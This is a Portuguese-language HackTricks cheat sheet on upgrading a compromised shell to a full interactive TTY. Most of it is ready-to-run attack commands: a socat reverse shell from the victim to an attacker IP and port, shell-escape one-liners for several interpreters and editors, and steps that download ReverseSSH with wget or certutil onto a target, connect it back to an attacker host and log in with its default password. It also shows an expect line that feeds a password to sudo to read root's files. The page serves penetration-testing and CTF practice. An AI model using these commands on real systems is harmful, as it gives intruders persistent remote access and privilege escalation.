mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-19 01:24:50 +00:00
130 lines
5.9 KiB
Markdown
130 lines
5.9 KiB
Markdown
# TTYs completos
|
|
|
|
<details>
|
|
|
|
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Outras maneiras de apoiar o HackTricks:
|
|
|
|
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
|
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
|
|
|
|
</details>
|
|
|
|
## TTY completo
|
|
|
|
Observe que o shell definido na variável `SHELL` **deve** estar **listado dentro de** _**/etc/shells**_ ou `O valor da variável SHELL não foi encontrado no arquivo /etc/shells Este incidente foi relatado`. Além disso, observe que os trechos a seguir só funcionam no bash. Se estiver em um zsh, mude para um bash antes de obter o shell executando `bash`.
|
|
|
|
#### Python
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
python3 -c 'import pty; pty.spawn("/bin/bash")'
|
|
|
|
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
|
|
```
|
|
{% endcode %}
|
|
|
|
{% hint style="info" %}
|
|
Você pode obter o **número** de **linhas** e **colunas** executando **`stty -a`**
|
|
{% endhint %}
|
|
|
|
#### script
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
script /dev/null -qc /bin/bash #/dev/null is to not store anything
|
|
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
|
|
```
|
|
{% endcode %}
|
|
|
|
#### socat
|
|
```bash
|
|
#Listener:
|
|
socat file:`tty`,raw,echo=0 tcp-listen:4444
|
|
|
|
#Victim:
|
|
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
|
|
```
|
|
### **Gerar shells**
|
|
|
|
* `python -c 'import pty; pty.spawn("/bin/sh")'`
|
|
* `echo os.system('/bin/bash')`
|
|
* `/bin/sh -i`
|
|
* `script -qc /bin/bash /dev/null`
|
|
* `perl -e 'exec "/bin/sh";'`
|
|
* perl: `exec "/bin/sh";`
|
|
* ruby: `exec "/bin/sh"`
|
|
* lua: `os.execute('/bin/sh')`
|
|
* IRB: `exec "/bin/sh"`
|
|
* vi: `:!bash`
|
|
* vi: `:set shell=/bin/bash:shell`
|
|
* nmap: `!sh`
|
|
|
|
## ReverseSSH
|
|
|
|
Uma maneira conveniente para **acesso de shell interativo**, bem como **transferência de arquivos** e **encaminhamento de portas**, é deixar o servidor ssh estaticamente vinculado [ReverseSSH](https://github.com/Fahrj/reverse-ssh) no alvo.
|
|
|
|
Abaixo está um exemplo para `x86` com binários comprimidos com upx. Para outros binários, verifique a [página de lançamentos](https://github.com/Fahrj/reverse-ssh/releases/latest/).
|
|
|
|
1. Prepare localmente para capturar a solicitação de encaminhamento de porta ssh:
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
# Drop it via your preferred way, e.g.
|
|
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
|
|
|
|
/dev/shm/reverse-ssh -v -l -p 4444
|
|
```
|
|
{% endcode %}
|
|
|
|
* (2a) Alvo Linux:
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
# Drop it via your preferred way, e.g.
|
|
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
|
|
|
|
/dev/shm/reverse-ssh -p 4444 kali@10.0.0.2
|
|
```
|
|
{% endcode %}
|
|
|
|
* (2b) Alvo Windows 10 (para versões anteriores, verifique o [readme do projeto](https://github.com/Fahrj/reverse-ssh#features)):
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
# Drop it via your preferred way, e.g.
|
|
certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe
|
|
|
|
reverse-ssh.exe -p 4444 kali@10.0.0.2
|
|
```
|
|
* Se a solicitação de encaminhamento de porta ReverseSSH foi bem-sucedida, agora você deve conseguir fazer login com a senha padrão `letmeinbrudipls` no contexto do usuário que está executando `reverse-ssh(.exe)`:
|
|
```bash
|
|
# Interactive shell access
|
|
ssh -p 8888 127.0.0.1
|
|
|
|
# Bidirectional file transfer
|
|
sftp -P 8888 127.0.0.1
|
|
```
|
|
## Sem TTY
|
|
|
|
Se por algum motivo você não conseguir obter um TTY completo, ainda é possível interagir com programas que esperam entrada do usuário. No exemplo a seguir, a senha é passada para o `sudo` para ler um arquivo:
|
|
```bash
|
|
expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'
|
|
```
|
|
<details>
|
|
|
|
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Outras maneiras de apoiar o HackTricks:
|
|
|
|
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
|
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
|
|
|
|
</details>
|